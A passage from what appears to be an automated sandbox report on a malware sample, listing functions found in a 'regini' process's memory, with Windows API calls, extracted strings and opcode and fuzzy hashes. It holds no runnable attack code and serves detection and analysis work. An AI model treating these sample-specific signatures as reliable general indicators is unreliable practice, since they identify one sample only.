                                                                    • Instruction Fuzzy Hash: C1F06D3279031037D6306698CC42F8B7699CB95B60F218019F70DAF2C1D9A5B8418AA5
                                                                    Function 02E29A50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,02E140EB,000000F4), ref: 02E29A8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                    • Instruction ID: ec38002fec0ee725c75ca93a928bbce7bdc83725299527b289c052a16bfc8292
                                                                    • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                    • Instruction Fuzzy Hash: 5EE06D712502047BD610EE59DC41F9B3BADEF85750F008418F908A7241C631B9118BB8
                                                                    Function 02E29A00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(02E11D69,?,02E25DDA,02E11D69,02E2589E,02E25DDA,?,02E11D69,02E2589E,00001000,?,?,00000000), ref: 02E29A3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                    • Instruction ID: d064e2c1924c2ff3626858d706cf4a81a80ed595fe0d139c0681091560fb4957
                                                                    • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                    • Instruction Fuzzy Hash: 1DE06D712482057BCA10EE59DC41FAB33ADEFC5710F008419F908A7241CB30B9108AB4
                                                                    Function 02E18690 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02E186BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                    • Instruction ID: 6aea7c0d60ab9eb20a73fe88ad5e9fa33f9e4190ec91035aa815052bc20017bd
                                                                    • Opcode Fuzzy Hash: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                    • Instruction Fuzzy Hash: 36E0867168030427FB24AAB8DC45F6633689B4872CF98DA70B91CDB2D1EB78F5014650
                                                                    Function 02E18477 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02E12060,02E281DF,02E2589E,02E12023), ref: 02E184B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                    • Instruction ID: cf80eefcaf8072f90f85cde268d79a3b9c682247b5885e3fddc7c6c3cd252f1b
                                                                    • Opcode Fuzzy Hash: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                    • Instruction Fuzzy Hash: B4E08631A843047EFB509BF49C47F9A27A99B14394F058164B90DEA1C1D9A9A5014F64
                                                                    Function 02E18480 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02E12060,02E281DF,02E2589E,02E12023), ref: 02E184B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                    • Instruction ID: 7a1adcc24040d594d5b924bddc45d1ecfcb7a848e3d43640cbf7dbd8efb8bf54
                                                                    • Opcode Fuzzy Hash: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                    • Instruction Fuzzy Hash: 46D05E71AC43043BF610EBE5DC47F16328DDB04798F05C064B90CEA2C2EDACF1004AA5
                                                                    Function 03672C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                                    • Instruction ID: 8879c64833d99df56973c153897a30f1d1648756cce15cdd82e5853e14c7e5b8
                                                                    • Opcode Fuzzy Hash: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                                    • Instruction Fuzzy Hash: B4B09B719015C5C5DA51F7604708717790567D1701F59C561D3030755F4779C1D1E175

                                                                    Non-executed Functions

                                                                    Function 039504D8 Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                    • Instruction ID: a0d0131b2334a74f5dd6cbe43e8a8f8b07aa8206dfa1c881ca410a509a3848f4
                                                                    • Opcode Fuzzy Hash: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                    • Instruction Fuzzy Hash: E941D575A18B0D4FD768EF699081677F3E5FB89300F50062DED8AC3352EA74E8868785
                                                                    Function 0395DDF9 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                    • API String ID: 0-3558027158
                                                                    • Opcode ID: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                    • Instruction ID: 3048e2bab25980bc748059b0e62f35f6cb61ecaf40af5b000bfff37205a97da3
                                                                    • Opcode Fuzzy Hash: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                    • Instruction Fuzzy Hash: 1D915EF04082988AC7158F54A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                    Function 03672890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                                    • Instruction ID: 282589b5143b222d48a16e6871b8351cf7c825e08d96a27db41d0a5a55bc5096
                                                                    • Opcode Fuzzy Hash: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                                    • Instruction Fuzzy Hash: 2F51D9B5A04516BFCB10DF9DC9A097EF7B8BB08200B58866AE4A5D7741D334DE44CBE4
                                                                    Function 036E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: cdcb91dfcdb8c5e1ded81b8bc6a3bc40378a7c6972b517b073fed77df2430c44
                                                                    • Instruction ID: 728af1ebdbf34ff3ed26d4e91740860a8d8c897e5f152741d2b48134ec00a12c
                                                                    • Opcode Fuzzy Hash: cdcb91dfcdb8c5e1ded81b8bc6a3bc40378a7c6972b517b073fed77df2430c44
                                                                    • Instruction Fuzzy Hash: 8351F9B5A01645AECB30EF5CCAA097FB7FEEB44200B148C59E4A6D7741D774EA488B70
                                                                    Function 03953BD1 Relevance: 15.0, Strings: 12, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                    • API String ID: 0-3778452520
                                                                    • Opcode ID: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                    • Instruction ID: ff6577d9ce807adb664928d5cc9760fe098f3553371ca6237ca6d69292be14ec
                                                                    • Opcode Fuzzy Hash: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                    • Instruction Fuzzy Hash: 3F115570C14A0CDADB04DF98E8866EDBB70FB04304FA49198D001AB296C7350A41CF86
                                                                    Function 03667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                                                    • ExecuteOptions, xrefs: 036A46A0
                                                                    • Execute=1, xrefs: 036A4713
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                                    • Instruction ID: 05985d717170dcfd592e2691e2d81588a5619331c743dbb5f3b07073dd2b2b65
                                                                    • Opcode Fuzzy Hash: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                                    • Instruction Fuzzy Hash: 76514935A003097ADF21EBA9DC89FAE77B8EF05348F0800ADD505EB291EB719E518F54
                                                                    Function 0367B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: 4d750a17a3fadbc85023cf9ac478ac7b3aee9617a1255f6828546db23ea22687
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: FA81F170E052499EDF28CF68C9957FEBBB6AF45320F9C425ED861AB390C7308851CB54
                                                                    Function 036E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 8bd54a6ade93b2e0d3c0c1375cffa11b53c6e369b6a11b571de40488a6ed9221
                                                                    • Instruction ID: dfa9aa5609888cdc6e3ba152944d784a298754e71406aa761ea85c5f30919c22
                                                                    • Opcode Fuzzy Hash: 8bd54a6ade93b2e0d3c0c1375cffa11b53c6e369b6a11b571de40488a6ed9221
                                                                    • Instruction Fuzzy Hash: C221977AE01219ABCB10EF79CD54AEEBBFDEF44640F480519EA05E7200E730DA158B91
                                                                    Function 0365F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                                                    • RTL: Re-Waiting, xrefs: 036A031E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                                                    • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                                    • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                                                    Function 0366BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                                                    • RTL: Resource at %p, xrefs: 036A7B8E
                                                                    • RTL: Re-Waiting, xrefs: 036A7BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                                                    • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                                    • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                                                    Function 0366B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                                                    Strings
                                                                    • RTL: Resource at %p, xrefs: 036A72A3
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                                                    • RTL: Re-Waiting, xrefs: 036A72C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                                                    • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                                                    Function 036E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 8edeca601ea4a759b4c086f9f8f7649fbcba605dedc01de4e5f67ee9678e7d4d
                                                                    • Instruction ID: 65ff56dca9309c5a90c73e9b85762627acf13fb668212e920e3419a28d3038a9
                                                                    • Opcode Fuzzy Hash: 8edeca601ea4a759b4c086f9f8f7649fbcba605dedc01de4e5f67ee9678e7d4d
                                                                    • Instruction Fuzzy Hash: 98318876A016199FCB20EF29CD50BEEB7BDEB44610F54495AE849D7200EB309A488F60
                                                                    Function 03677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                                                    Function 03639126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                                                    • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4